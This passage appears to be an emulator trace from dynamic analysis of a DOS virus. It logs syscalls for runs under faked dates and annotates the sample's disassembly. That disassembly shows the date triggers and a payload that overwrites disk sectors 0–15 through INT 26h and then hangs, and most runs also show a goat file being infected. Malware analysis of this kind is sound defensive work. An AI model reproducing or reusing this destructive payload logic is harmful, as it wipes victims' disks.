0x12fc4: jne 0x12fe6 ; no match: go to the next date check
0x12fc6: cmp dl, 0x18 ; DL = day of month; 0x18 = 24
0x12fc9: jne 0x12fe6
0x12fcb: mov ah, 0x19 ; payload: AH=19h returns the default drive in AL
0x12fcd: int 0x21
0x12fcf: mov dx, 0 ; DX = first logical sector (0)
0x12fd2: mov cx, 0x10 ; CX = sector count (16)
0x12fd5: mov bx, 0 ; DS:BX = source buffer, offset 0
0x12fd8: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x12fda: mov ah, 9 ; AH=09h prints the '$'-terminated string at DS:DX
0x12fdc: mov dx, 0xe
0x12fdf: int 0x21
0x12fe1: jmp 0x12fe1 ; branches to itself, so execution stays at this address
0x12fe3: jmp 0x133c5 ; follows the self-jump; not reached by fall-through
0x12fe6: mov ah, 0x2a ; AH=2Ah Get date, repeated before the next comparison
0x12fe8: int 0x21
0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19 ; 0x19 = 25; the disassembly window ends here
; Date triggers 2 and 3 of 4: 25 December (reuses the payload at 0x12fcb) and 1 January 2000.
2018-12-25T12:01:49.444927967Z 42 PC: 12fea | Get date 0x12fea: cmp dh, 0xc ; DH = month from INT 21h/AH=2Ah; 0xc = December
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19 ; DL = day of month; 0x19 = 25
0x12ff2: jne 0x12ff6
0x12ff4: jmp 0x12fcb ; match: run the same payload as the 24 December check
0x12ff6: mov ah, 0x2a ; AH=2Ah Get date again
0x12ff8: int 0x21
0x12ffa: cmp dh, 1 ; month = January
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1 ; day = 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0 ; CX = year; 0x7d0 = 2000
0x13008: jne 0x13025
0x1300a: mov ah, 0x19 ; second payload copy: AH=19h returns the default drive in AL
0x1300c: int 0x21
0x1300e: mov dx, 0 ; DX = first logical sector (0)
0x13011: mov cx, 0x10 ; CX = sector count (16)
0x13014: mov bx, 0 ; DS:BX = source buffer, offset 0
0x13017: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x13019: mov ah, 9 ; the disassembly window ends here
; Date trigger 3 of 4: 1 January 2000, with its own payload copy and message offset 0x10e.
2018-12-25T12:01:49.446876326Z 42 PC: 12ffa | Get date 0x12ffa: cmp dh, 1 ; DH = month from INT 21h/AH=2Ah; 1 = January
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1 ; DL = day of month; 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0 ; CX = year; 0x7d0 = 2000
0x13008: jne 0x13025 ; any mismatch: go to the last date check
0x1300a: mov ah, 0x19 ; payload: AH=19h returns the default drive in AL
0x1300c: int 0x21
0x1300e: mov dx, 0 ; DX = first logical sector (0)
0x13011: mov cx, 0x10 ; CX = sector count (16)
0x13014: mov bx, 0 ; DS:BX = source buffer, offset 0
0x13017: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x13019: mov ah, 9 ; AH=09h prints the '$'-terminated string at DS:DX
0x1301b: mov dx, 0x10e
0x1301e: int 0x21
0x13020: jmp 0x13020 ; branches to itself, so execution stays at this address
0x13022: jmp 0x133c5 ; follows the self-jump; not reached by fall-through
0x13025: mov ah, 0x2a ; AH=2Ah Get date for the last check
0x13027: int 0x21
0x13029: cmp dh, 0xb ; 0xb = November; the disassembly window ends here
; Date trigger 4 of 4: 6 November. When it does not match, execution continues at 0x1304e.
2018-12-25T12:01:49.449146242Z 42 PC: 13029 | Get date 0x13029: cmp dh, 0xb ; DH = month from INT 21h/AH=2Ah; 0xb = November
0x1302c: jne 0x1304e
0x1302e: cmp dl, 6 ; DL = day of month; 6
0x13031: jne 0x1304e
0x13033: mov ah, 0x19 ; payload: AH=19h returns the default drive in AL
0x13035: int 0x21
0x13037: mov dx, 0 ; DX = first logical sector (0)
0x1303a: mov cx, 0x10 ; CX = sector count (16)
0x1303d: mov bx, 0 ; DS:BX = source buffer, offset 0
0x13040: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x13042: mov ah, 9 ; AH=09h prints the '$'-terminated string at DS:DX
0x13044: mov dx, 0x1a7
0x13047: int 0x21
0x13049: jmp 0x13049 ; branches to itself, so execution stays at this address
0x1304b: jmp 0x133c5 ; follows the self-jump; not reached by fall-through
0x1304e: mov ax, 0xffff ; no trigger matched: DS is set to 0xffff
0x13051: mov ds, ax
0x13053: push cs ; ES = CS
0x13054: pop es
0x13055: xor si, si ; SI = 0; what this setup is used for lies outside the window
2018-12-25T12:01:49.456140855Z 74 PC: 130dd | Reallocate memory
2018-12-25T12:01:49.457358994Z 74 PC: 12e31 | Reallocate memory
2018-12-25T12:01:49.458648926Z 72 PC: 12e3a | Allocate memory
2018-12-25T12:01:49.460045898Z 67 PC: 130e4 | Get or set file attributes
2018-12-25T12:01:49.463605425Z 61 PC: 130e4 | Open file (See above)
2018-12-25T12:01:49.468018305Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:49.476842419Z 63 PC: 130e4 | Read file or device (See above)
2018-12-25T12:01:49.478837733Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:49.479918513Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:49.48279665Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:50.340383517Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:50.342926145Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:50.347053244Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:50.349086231Z 62 PC: 130e4 | Close file (See above)
2018-12-25T12:01:50.459489544Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:01:50.466586388Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":25,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7542,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:49.476243137Z 22 PC: 12de1 | Create or truncate file
2018-12-25T12:01:49.487330869Z 11 PC: 12de5 | Get input status
2018-12-25T12:01:49.490115201Z 250 PC: 12ded | UNKNOWN!
2018-12-25T12:01:49.491137857Z 75 PC: 12fad | Execute program
; Date trigger 1 of 4: 24 December. The payload body at 0x12fcb is also the target of the 25 December check.
2018-12-25T12:01:49.493145168Z 42 PC: 12fc1 | Get date 0x12fc1: cmp dh, 0xc ; DH = month from INT 21h/AH=2Ah; 0xc = December
0x12fc4: jne 0x12fe6 ; no match: go to the next date check
0x12fc6: cmp dl, 0x18 ; DL = day of month; 0x18 = 24
0x12fc9: jne 0x12fe6
0x12fcb: mov ah, 0x19 ; payload: AH=19h returns the default drive in AL
0x12fcd: int 0x21
0x12fcf: mov dx, 0 ; DX = first logical sector (0)
0x12fd2: mov cx, 0x10 ; CX = sector count (16)
0x12fd5: mov bx, 0 ; DS:BX = source buffer, offset 0
0x12fd8: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x12fda: mov ah, 9 ; AH=09h prints the '$'-terminated string at DS:DX
0x12fdc: mov dx, 0xe
0x12fdf: int 0x21
0x12fe1: jmp 0x12fe1 ; branches to itself, so execution stays at this address
0x12fe3: jmp 0x133c5 ; follows the self-jump; not reached by fall-through
0x12fe6: mov ah, 0x2a ; AH=2Ah Get date, repeated before the next comparison
0x12fe8: int 0x21
0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19 ; 0x19 = 25; the disassembly window ends here
; Date triggers 2 and 3 of 4: 25 December (reuses the payload at 0x12fcb) and 1 January 2000.
; In this run the 25 December branch was taken: the next logged row is Get default drive at PC 12fcf, and the JSON record printed just above the run sets Day 25, Month 12.
; The table has no row for int 0x26, so the sector write is not recorded in this trace; the last row is Display string at the self-jump address 12fe1.
2018-12-25T12:01:49.495693643Z 42 PC: 12fea | Get date 0x12fea: cmp dh, 0xc ; DH = month from INT 21h/AH=2Ah; 0xc = December
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19 ; DL = day of month; 0x19 = 25
0x12ff2: jne 0x12ff6
0x12ff4: jmp 0x12fcb ; match: run the same payload as the 24 December check
0x12ff6: mov ah, 0x2a ; AH=2Ah Get date again
0x12ff8: int 0x21
0x12ffa: cmp dh, 1 ; month = January
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1 ; day = 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0 ; CX = year; 0x7d0 = 2000
0x13008: jne 0x13025
0x1300a: mov ah, 0x19 ; second payload copy: AH=19h returns the default drive in AL
0x1300c: int 0x21
0x1300e: mov dx, 0 ; DX = first logical sector (0)
0x13011: mov cx, 0x10 ; CX = sector count (16)
0x13014: mov bx, 0 ; DS:BX = source buffer, offset 0
0x13017: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x13019: mov ah, 9 ; the disassembly window ends here
2018-12-25T12:01:49.498359974Z 25 PC: 12fcf | Get default drive
2018-12-25T12:01:50.340534384Z 9 PC: 12fe1 | Display string (Could not find end pointer)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7542,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:49.494925785Z 22 PC: 12de1 | Create or truncate file
2018-12-25T12:01:49.496710538Z 11 PC: 12de5 | Get input status
2018-12-25T12:01:49.499315541Z 250 PC: 12ded | UNKNOWN!
2018-12-25T12:01:49.500221387Z 75 PC: 12fad | Execute program
; Date trigger 1 of 4: 24 December. The payload body at 0x12fcb is also the target of the 25 December check.
2018-12-25T12:01:49.502007763Z 42 PC: 12fc1 | Get date 0x12fc1: cmp dh, 0xc ; DH = month from INT 21h/AH=2Ah; 0xc = December
0x12fc4: jne 0x12fe6 ; no match: go to the next date check
0x12fc6: cmp dl, 0x18 ; DL = day of month; 0x18 = 24
0x12fc9: jne 0x12fe6
0x12fcb: mov ah, 0x19 ; payload: AH=19h returns the default drive in AL
0x12fcd: int 0x21
0x12fcf: mov dx, 0 ; DX = first logical sector (0)
0x12fd2: mov cx, 0x10 ; CX = sector count (16)
0x12fd5: mov bx, 0 ; DS:BX = source buffer, offset 0
0x12fd8: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x12fda: mov ah, 9 ; AH=09h prints the '$'-terminated string at DS:DX
0x12fdc: mov dx, 0xe
0x12fdf: int 0x21
0x12fe1: jmp 0x12fe1 ; branches to itself, so execution stays at this address
0x12fe3: jmp 0x133c5 ; follows the self-jump; not reached by fall-through
0x12fe6: mov ah, 0x2a ; AH=2Ah Get date, repeated before the next comparison
0x12fe8: int 0x21
0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19 ; 0x19 = 25; the disassembly window ends here
; Date triggers 2 and 3 of 4: 25 December (reuses the payload at 0x12fcb) and 1 January 2000.
2018-12-25T12:01:49.504677255Z 42 PC: 12fea | Get date 0x12fea: cmp dh, 0xc ; DH = month from INT 21h/AH=2Ah; 0xc = December
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19 ; DL = day of month; 0x19 = 25
0x12ff2: jne 0x12ff6
0x12ff4: jmp 0x12fcb ; match: run the same payload as the 24 December check
0x12ff6: mov ah, 0x2a ; AH=2Ah Get date again
0x12ff8: int 0x21
0x12ffa: cmp dh, 1 ; month = January
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1 ; day = 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0 ; CX = year; 0x7d0 = 2000
0x13008: jne 0x13025
0x1300a: mov ah, 0x19 ; second payload copy: AH=19h returns the default drive in AL
0x1300c: int 0x21
0x1300e: mov dx, 0 ; DX = first logical sector (0)
0x13011: mov cx, 0x10 ; CX = sector count (16)
0x13014: mov bx, 0 ; DS:BX = source buffer, offset 0
0x13017: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x13019: mov ah, 9 ; the disassembly window ends here
; Date trigger 3 of 4: 1 January 2000, with its own payload copy and message offset 0x10e.
2018-12-25T12:01:49.506636292Z 42 PC: 12ffa | Get date 0x12ffa: cmp dh, 1 ; DH = month from INT 21h/AH=2Ah; 1 = January
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1 ; DL = day of month; 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0 ; CX = year; 0x7d0 = 2000
0x13008: jne 0x13025 ; any mismatch: go to the last date check
0x1300a: mov ah, 0x19 ; payload: AH=19h returns the default drive in AL
0x1300c: int 0x21
0x1300e: mov dx, 0 ; DX = first logical sector (0)
0x13011: mov cx, 0x10 ; CX = sector count (16)
0x13014: mov bx, 0 ; DS:BX = source buffer, offset 0
0x13017: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x13019: mov ah, 9 ; AH=09h prints the '$'-terminated string at DS:DX
0x1301b: mov dx, 0x10e
0x1301e: int 0x21
0x13020: jmp 0x13020 ; branches to itself, so execution stays at this address
0x13022: jmp 0x133c5 ; follows the self-jump; not reached by fall-through
0x13025: mov ah, 0x2a ; AH=2Ah Get date for the last check
0x13027: int 0x21
0x13029: cmp dh, 0xb ; 0xb = November; the disassembly window ends here
; Date trigger 4 of 4: 6 November. When it does not match, execution continues at 0x1304e.
2018-12-25T12:01:49.508867996Z 42 PC: 13029 | Get date 0x13029: cmp dh, 0xb ; DH = month from INT 21h/AH=2Ah; 0xb = November
0x1302c: jne 0x1304e
0x1302e: cmp dl, 6 ; DL = day of month; 6
0x13031: jne 0x1304e
0x13033: mov ah, 0x19 ; payload: AH=19h returns the default drive in AL
0x13035: int 0x21
0x13037: mov dx, 0 ; DX = first logical sector (0)
0x1303a: mov cx, 0x10 ; CX = sector count (16)
0x1303d: mov bx, 0 ; DS:BX = source buffer, offset 0
0x13040: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x13042: mov ah, 9 ; AH=09h prints the '$'-terminated string at DS:DX
0x13044: mov dx, 0x1a7
0x13047: int 0x21
0x13049: jmp 0x13049 ; branches to itself, so execution stays at this address
0x1304b: jmp 0x133c5 ; follows the self-jump; not reached by fall-through
0x1304e: mov ax, 0xffff ; no trigger matched: DS is set to 0xffff
0x13051: mov ds, ax
0x13053: push cs ; ES = CS
0x13054: pop es
0x13055: xor si, si ; SI = 0; what this setup is used for lies outside the window
2018-12-25T12:01:49.511976565Z 74 PC: 130dd | Reallocate memory
2018-12-25T12:01:49.513826147Z 74 PC: 12e31 | Reallocate memory
2018-12-25T12:01:49.515298379Z 72 PC: 12e3a | Allocate memory
2018-12-25T12:01:49.518058982Z 67 PC: 130e4 | Get or set file attributes
2018-12-25T12:01:49.523957993Z 61 PC: 130e4 | Open file (See above)
2018-12-25T12:01:49.530083186Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:49.531937255Z 63 PC: 130e4 | Read file or device (See above)
2018-12-25T12:01:49.534419472Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:49.535785198Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:49.539245908Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:50.459345028Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:50.461077453Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:50.465069011Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:50.467935808Z 62 PC: 130e4 | Close file (See above)
2018-12-25T12:01:50.475220169Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:01:50.481940642Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7542,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:49.648756016Z 22 PC: 12de1 | Create or truncate file
2018-12-25T12:01:49.650890045Z 11 PC: 12de5 | Get input status
2018-12-25T12:01:49.65368537Z 250 PC: 12ded | UNKNOWN!
2018-12-25T12:01:49.654559391Z 75 PC: 12fad | Execute program
; Date trigger 1 of 4: 24 December. The payload body at 0x12fcb is also the target of the 25 December check.
2018-12-25T12:01:49.656540134Z 42 PC: 12fc1 | Get date 0x12fc1: cmp dh, 0xc ; DH = month from INT 21h/AH=2Ah; 0xc = December
0x12fc4: jne 0x12fe6 ; no match: go to the next date check
0x12fc6: cmp dl, 0x18 ; DL = day of month; 0x18 = 24
0x12fc9: jne 0x12fe6
0x12fcb: mov ah, 0x19 ; payload: AH=19h returns the default drive in AL
0x12fcd: int 0x21
0x12fcf: mov dx, 0 ; DX = first logical sector (0)
0x12fd2: mov cx, 0x10 ; CX = sector count (16)
0x12fd5: mov bx, 0 ; DS:BX = source buffer, offset 0
0x12fd8: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x12fda: mov ah, 9 ; AH=09h prints the '$'-terminated string at DS:DX
0x12fdc: mov dx, 0xe
0x12fdf: int 0x21
0x12fe1: jmp 0x12fe1 ; branches to itself, so execution stays at this address
0x12fe3: jmp 0x133c5 ; follows the self-jump; not reached by fall-through
0x12fe6: mov ah, 0x2a ; AH=2Ah Get date, repeated before the next comparison
0x12fe8: int 0x21
0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19 ; 0x19 = 25; the disassembly window ends here
; Date triggers 2 and 3 of 4: 25 December (reuses the payload at 0x12fcb) and 1 January 2000.
2018-12-25T12:01:49.658847719Z 42 PC: 12fea | Get date 0x12fea: cmp dh, 0xc ; DH = month from INT 21h/AH=2Ah; 0xc = December
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19 ; DL = day of month; 0x19 = 25
0x12ff2: jne 0x12ff6
0x12ff4: jmp 0x12fcb ; match: run the same payload as the 24 December check
0x12ff6: mov ah, 0x2a ; AH=2Ah Get date again
0x12ff8: int 0x21
0x12ffa: cmp dh, 1 ; month = January
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1 ; day = 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0 ; CX = year; 0x7d0 = 2000
0x13008: jne 0x13025
0x1300a: mov ah, 0x19 ; second payload copy: AH=19h returns the default drive in AL
0x1300c: int 0x21
0x1300e: mov dx, 0 ; DX = first logical sector (0)
0x13011: mov cx, 0x10 ; CX = sector count (16)
0x13014: mov bx, 0 ; DS:BX = source buffer, offset 0
0x13017: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x13019: mov ah, 9 ; the disassembly window ends here
; Date trigger 3 of 4: 1 January 2000, with its own payload copy and message offset 0x10e.
2018-12-25T12:01:49.661012389Z 42 PC: 12ffa | Get date 0x12ffa: cmp dh, 1 ; DH = month from INT 21h/AH=2Ah; 1 = January
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1 ; DL = day of month; 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0 ; CX = year; 0x7d0 = 2000
0x13008: jne 0x13025 ; any mismatch: go to the last date check
0x1300a: mov ah, 0x19 ; payload: AH=19h returns the default drive in AL
0x1300c: int 0x21
0x1300e: mov dx, 0 ; DX = first logical sector (0)
0x13011: mov cx, 0x10 ; CX = sector count (16)
0x13014: mov bx, 0 ; DS:BX = source buffer, offset 0
0x13017: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x13019: mov ah, 9 ; AH=09h prints the '$'-terminated string at DS:DX
0x1301b: mov dx, 0x10e
0x1301e: int 0x21
0x13020: jmp 0x13020 ; branches to itself, so execution stays at this address
0x13022: jmp 0x133c5 ; follows the self-jump; not reached by fall-through
0x13025: mov ah, 0x2a ; AH=2Ah Get date for the last check
0x13027: int 0x21
0x13029: cmp dh, 0xb ; 0xb = November; the disassembly window ends here
; Date trigger 4 of 4: 6 November. When it does not match, execution continues at 0x1304e.
2018-12-25T12:01:49.663613862Z 42 PC: 13029 | Get date 0x13029: cmp dh, 0xb ; DH = month from INT 21h/AH=2Ah; 0xb = November
0x1302c: jne 0x1304e
0x1302e: cmp dl, 6 ; DL = day of month; 6
0x13031: jne 0x1304e
0x13033: mov ah, 0x19 ; payload: AH=19h returns the default drive in AL
0x13035: int 0x21
0x13037: mov dx, 0 ; DX = first logical sector (0)
0x1303a: mov cx, 0x10 ; CX = sector count (16)
0x1303d: mov bx, 0 ; DS:BX = source buffer, offset 0
0x13040: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x13042: mov ah, 9 ; AH=09h prints the '$'-terminated string at DS:DX
0x13044: mov dx, 0x1a7
0x13047: int 0x21
0x13049: jmp 0x13049 ; branches to itself, so execution stays at this address
0x1304b: jmp 0x133c5 ; follows the self-jump; not reached by fall-through
0x1304e: mov ax, 0xffff ; no trigger matched: DS is set to 0xffff
0x13051: mov ds, ax
0x13053: push cs ; ES = CS
0x13054: pop es
0x13055: xor si, si ; SI = 0; what this setup is used for lies outside the window
2018-12-25T12:01:49.666327377Z 74 PC: 130dd | Reallocate memory
2018-12-25T12:01:49.668002948Z 74 PC: 12e31 | Reallocate memory
2018-12-25T12:01:49.66954132Z 72 PC: 12e3a | Allocate memory
2018-12-25T12:01:49.671125353Z 67 PC: 130e4 | Get or set file attributes
2018-12-25T12:01:49.674728822Z 61 PC: 130e4 | Open file (See above)
2018-12-25T12:01:49.681423741Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:49.682707322Z 63 PC: 130e4 | Read file or device (See above)
2018-12-25T12:01:49.685273905Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:49.686190507Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:49.695562842Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:51.815897245Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:51.817702475Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:51.822872626Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:51.824746984Z 62 PC: 130e4 | Close file (See above)
2018-12-25T12:01:51.950465328Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:01:51.957878975Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":2,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7542,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:49.710969556Z 22 PC: 12de1 | Create or truncate file
2018-12-25T12:01:49.712536273Z 11 PC: 12de5 | Get input status
2018-12-25T12:01:49.716045724Z 250 PC: 12ded | UNKNOWN!
2018-12-25T12:01:49.716884281Z 75 PC: 12fad | Execute program
; Date trigger 1 of 4: 24 December. The payload body at 0x12fcb is also the target of the 25 December check.
2018-12-25T12:01:49.718930286Z 42 PC: 12fc1 | Get date 0x12fc1: cmp dh, 0xc ; DH = month from INT 21h/AH=2Ah; 0xc = December
0x12fc4: jne 0x12fe6 ; no match: go to the next date check
0x12fc6: cmp dl, 0x18 ; DL = day of month; 0x18 = 24
0x12fc9: jne 0x12fe6
0x12fcb: mov ah, 0x19 ; payload: AH=19h returns the default drive in AL
0x12fcd: int 0x21
0x12fcf: mov dx, 0 ; DX = first logical sector (0)
0x12fd2: mov cx, 0x10 ; CX = sector count (16)
0x12fd5: mov bx, 0 ; DS:BX = source buffer, offset 0
0x12fd8: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x12fda: mov ah, 9 ; AH=09h prints the '$'-terminated string at DS:DX
0x12fdc: mov dx, 0xe
0x12fdf: int 0x21
0x12fe1: jmp 0x12fe1 ; branches to itself, so execution stays at this address
0x12fe3: jmp 0x133c5 ; follows the self-jump; not reached by fall-through
0x12fe6: mov ah, 0x2a ; AH=2Ah Get date, repeated before the next comparison
0x12fe8: int 0x21
0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19 ; 0x19 = 25; the disassembly window ends here
; Date triggers 2 and 3 of 4: 25 December (reuses the payload at 0x12fcb) and 1 January 2000.
2018-12-25T12:01:49.72136517Z 42 PC: 12fea | Get date 0x12fea: cmp dh, 0xc ; DH = month from INT 21h/AH=2Ah; 0xc = December
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19 ; DL = day of month; 0x19 = 25
0x12ff2: jne 0x12ff6
0x12ff4: jmp 0x12fcb ; match: run the same payload as the 24 December check
0x12ff6: mov ah, 0x2a ; AH=2Ah Get date again
0x12ff8: int 0x21
0x12ffa: cmp dh, 1 ; month = January
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1 ; day = 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0 ; CX = year; 0x7d0 = 2000
0x13008: jne 0x13025
0x1300a: mov ah, 0x19 ; second payload copy: AH=19h returns the default drive in AL
0x1300c: int 0x21
0x1300e: mov dx, 0 ; DX = first logical sector (0)
0x13011: mov cx, 0x10 ; CX = sector count (16)
0x13014: mov bx, 0 ; DS:BX = source buffer, offset 0
0x13017: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x13019: mov ah, 9 ; the disassembly window ends here
; Date trigger 3 of 4: 1 January 2000, with its own payload copy and message offset 0x10e.
2018-12-25T12:01:49.72363497Z 42 PC: 12ffa | Get date 0x12ffa: cmp dh, 1 ; DH = month from INT 21h/AH=2Ah; 1 = January
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1 ; DL = day of month; 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0 ; CX = year; 0x7d0 = 2000
0x13008: jne 0x13025 ; any mismatch: go to the last date check
0x1300a: mov ah, 0x19 ; payload: AH=19h returns the default drive in AL
0x1300c: int 0x21
0x1300e: mov dx, 0 ; DX = first logical sector (0)
0x13011: mov cx, 0x10 ; CX = sector count (16)
0x13014: mov bx, 0 ; DS:BX = source buffer, offset 0
0x13017: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x13019: mov ah, 9 ; AH=09h prints the '$'-terminated string at DS:DX
0x1301b: mov dx, 0x10e
0x1301e: int 0x21
0x13020: jmp 0x13020 ; branches to itself, so execution stays at this address
0x13022: jmp 0x133c5 ; follows the self-jump; not reached by fall-through
0x13025: mov ah, 0x2a ; AH=2Ah Get date for the last check
0x13027: int 0x21
0x13029: cmp dh, 0xb ; 0xb = November; the disassembly window ends here
; Date trigger 4 of 4: 6 November. When it does not match, execution continues at 0x1304e.
2018-12-25T12:01:49.725909602Z 42 PC: 13029 | Get date 0x13029: cmp dh, 0xb ; DH = month from INT 21h/AH=2Ah; 0xb = November
0x1302c: jne 0x1304e
0x1302e: cmp dl, 6 ; DL = day of month; 6
0x13031: jne 0x1304e
0x13033: mov ah, 0x19 ; payload: AH=19h returns the default drive in AL
0x13035: int 0x21
0x13037: mov dx, 0 ; DX = first logical sector (0)
0x1303a: mov cx, 0x10 ; CX = sector count (16)
0x1303d: mov bx, 0 ; DS:BX = source buffer, offset 0
0x13040: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x13042: mov ah, 9 ; AH=09h prints the '$'-terminated string at DS:DX
0x13044: mov dx, 0x1a7
0x13047: int 0x21
0x13049: jmp 0x13049 ; branches to itself, so execution stays at this address
0x1304b: jmp 0x133c5 ; follows the self-jump; not reached by fall-through
0x1304e: mov ax, 0xffff ; no trigger matched: DS is set to 0xffff
0x13051: mov ds, ax
0x13053: push cs ; ES = CS
0x13054: pop es
0x13055: xor si, si ; SI = 0; what this setup is used for lies outside the window
2018-12-25T12:01:49.728973731Z 74 PC: 130dd | Reallocate memory
2018-12-25T12:01:49.730731087Z 74 PC: 12e31 | Reallocate memory
2018-12-25T12:01:49.732140379Z 72 PC: 12e3a | Allocate memory
2018-12-25T12:01:49.734136002Z 67 PC: 130e4 | Get or set file attributes
2018-12-25T12:01:49.739958986Z 61 PC: 130e4 | Open file (See above)
2018-12-25T12:01:49.7466083Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:49.758568063Z 63 PC: 130e4 | Read file or device (See above)
2018-12-25T12:01:49.761388938Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:49.762841777Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:49.766719226Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:51.815898321Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:51.817983466Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:51.822976221Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:51.825189415Z 62 PC: 130e4 | Close file (See above)
2018-12-25T12:01:52.003329777Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:01:52.010828721Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":2000,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7542,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:49.739438739Z 22 PC: 12de1 | Create or truncate file
2018-12-25T12:01:49.741455085Z 11 PC: 12de5 | Get input status
